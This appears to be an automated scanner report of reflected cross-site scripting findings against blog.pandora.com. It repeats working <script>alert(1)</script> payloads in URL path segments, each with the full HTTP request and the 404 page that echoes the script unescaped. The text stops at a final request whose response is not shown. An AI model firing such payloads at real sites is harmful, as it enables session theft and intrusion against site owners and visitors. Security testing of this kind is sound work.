The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3bf47<script>alert(1)</script>c247d05fe1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9839c<script>alert(1)</script>cc1f4677e63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4d9b<script>alert(1)</script>1d7f2c0691b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 59e99<script>alert(1)</script>825e8cfc0de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe2be<script>alert(1)</script>1f3f48cf5b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ac1f<script>alert(1)</script>ef5a796adc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34032<script>alert(1)</script>06892156e4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6411d<script>alert(1)</script>c8b26e3f983 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:53 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1573<script>alert(1)</script>3b6a99d2827 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 172d5<script>alert(1)</script>d6b14e8dbb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ee2e<script>alert(1)</script>224981c07fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5184f<script>alert(1)</script>5f6e8db7f13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dff11<script>alert(1)</script>9e8c2c2eee5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b984<script>alert(1)</script>5934a17f05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abb6d<script>alert(1)</script>79106cb9952 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 465a8<script>alert(1)</script>77d6f7cf9b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:53 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8193f<script>alert(1)</script>fa1c0f6c054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fba06<script>alert(1)</script>415a42b75c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 189bf<script>alert(1)</script>7e15ac1b4e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df6e5<script>alert(1)</script>6172eb86b30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
